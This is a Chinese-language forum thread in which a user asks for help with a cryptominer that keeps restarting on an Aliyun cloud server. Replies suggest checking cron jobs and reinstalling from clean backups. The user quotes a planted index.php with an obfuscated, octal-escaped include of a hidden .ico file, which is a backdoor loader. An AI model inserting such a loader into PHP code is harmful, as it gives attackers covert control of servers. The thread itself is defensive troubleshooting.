Home Sign Up Sign In
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
liuchang8877
V2EX  ›  问与答

阿里云 ECS 被挖矿程序跑满 CPU,在线求助

  •   
  •   liuchang8877 · Jan 30, 2019 · 4740 views
    This topic created in 2648 days ago, the information mentioned may be changed or developed.

    实在没办法了,找了阿里云的技术支持还是搞不定,希望大家帮忙 看看 top 的占用

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    2162 www-data 20 0 44796 2628 468 S 51.8 0.3 1:02.34 xxq6862

  • CPU
  • 阿里云
  • virt
  • res
    21 replies    2019-01-31 09:49:08 +08:00
    CivAx
        1
    CivAx  
       Jan 30, 2019
    既然被跑满了,又能抓到 PID,为啥不直接 kill -9 ?
    liuchang8877
        2
    liuchang8877  
    OP
       Jan 30, 2019
    没用的,有定时任务应该,kill 掉后还是会重启
    已经从参考这个做了,还是不行,没找到它的定时任务

    https://blog.csdn.net/zzf1510711060/article/details/83015700
    ThirdFlame
        3
    ThirdFlame  
       Jan 30, 2019
    /etc/crontab 查看一下
    westoy
        4
    westoy  
       Jan 30, 2019   ❤️ 1
    先找个做安全的查查系统日志和程序日志, 看看是怎么被日的

    再把数据和程序备份下, 如果问题出在程序上, 修正之

    重做系统

    重新导入数据和安装程序

    不要试图现在这个系统修修补补继续用, 搞这个的都后多重后手防止被杀的, 你查二三重马的成本比重做高多了
    PureWhiteWu
        5
    PureWhiteWu  
       Jan 30, 2019
    直接重装系统啊。。。。
    egen
        6
    egen  
       Jan 30, 2019
    既然可以放个挖坑就不能顺手放个后门?清空重来吧,不然真过年了
    CivAx
        7
    CivAx  
       Jan 30, 2019
    @liuchang8877 #2 要不你给一下登录信息我帮你上去看看吧……(正好摸鱼
    AstroProfundis
        8
    AstroProfundis  
       Jan 30, 2019   ❤️ 1
    备份数据
    开一台新的 ecs
    部署干净环境
    改强密码 /证书登录&检查应用的安全漏洞
    导入备份的数据
    改访问(域名、ip 之类)地址
    旧 ecs 关机,观察没问题之后销毁旧 ecs
    zhoulouzi
        9
    zhoulouzi  
       Jan 30, 2019
    不清楚 Aliyun ECS 怎么跑的, 但是类似之前 kubernetes 有一个 CVE-2018-1002105 的 API 安全漏洞,也是会被远程攻击,在容器里跑挖矿程序, 你可以相同思路看看你的 docker 的 API 是不是未授权就暴露出来了
    liuchang8877
        10
    liuchang8877  
    OP
       Jan 30, 2019
    哎,不想清空从来呀就是,成本有点高,三套程序,加上 https 证书什么的,一弄就是一天,阿里云上都做了快照,数据再备份下,郁闷。
    liuchang8877
        11
    liuchang8877  
    OP
       Jan 30, 2019
    这是什么玩法?每个目录下给我塞了一个 index.php 文件,引入了一个远程库?

    <?php
    /*fb6ae*/

    @include "\057var\057www\057htm\154/mo\144ule\163/im\141ge/\164est\163/.2\066a24\067ab.\151co";

    /*fb6ae*/
    msg7086
        12
    msg7086  
       Jan 30, 2019
    备份数据重装不就得了。清理病毒什么的就不要多想了……
    liuchang8877
        13
    liuchang8877  
    OP
       Jan 30, 2019
    只能重装了,奋战....
    goodryb
        14
    goodryb  
       Jan 30, 2019
    如果由之前的快照,直接回滚之前的快照即可。
    如果之前没有快照,建议对现在系统做手动快照。完成后重置系统,然后部署基础环境,挂载前面创建的快照,把数据拷贝过去。

    快照是个好东西,一定要开起来
    ccc008
        15
    ccc008  
       Jan 30, 2019
    @liuchang8877 #10 你慢慢分析查杀病毒。1 天都搞不定的。
    cpdyj0
        16
    cpdyj0  
       Jan 30, 2019 via Android
    备份文件,重装系统…最简单粗暴但却有效的办法…
    DANG
        17
    DANG  
       Jan 30, 2019
    proc 下根据 pid 找文件路径删文件杀进程
    crontab 里看定时任务里有没有脚本网址,有的话下载下来看看都干啥了。然后删除任务。
    这种攻击都是服务器有漏洞导致的,建议关闭类似 8088 这样的危险端口。最主要的还是找到计划任务的那个脚本
    yuikns
        18
    yuikns  
       Jan 30, 2019
    人家不仅能装 crontab,还能给你装各种启动和后台,还能篡改你的系统命令。

    还是重装吧。
    jay4497
        19
    jay4497  
       Jan 30, 2019   ❤️ 1
    include 的那段 https://www.unphp.net/decode/d99b8171c0ae8442aaa54df56cdcadf0/
    liuchang8877
        20
    liuchang8877  
    OP
       Jan 30, 2019
    @jay4497
    多谢,我给这个也删了试试
    RubyJack
        21
    RubyJack  
       Jan 31, 2019
    根除或者 cgroup 限制
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2515 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 114ms · UTC 15:30 · PVG 23:30 · LAX 08:30 · JFK 11:30
    ♥ Do have faith in what you're doing.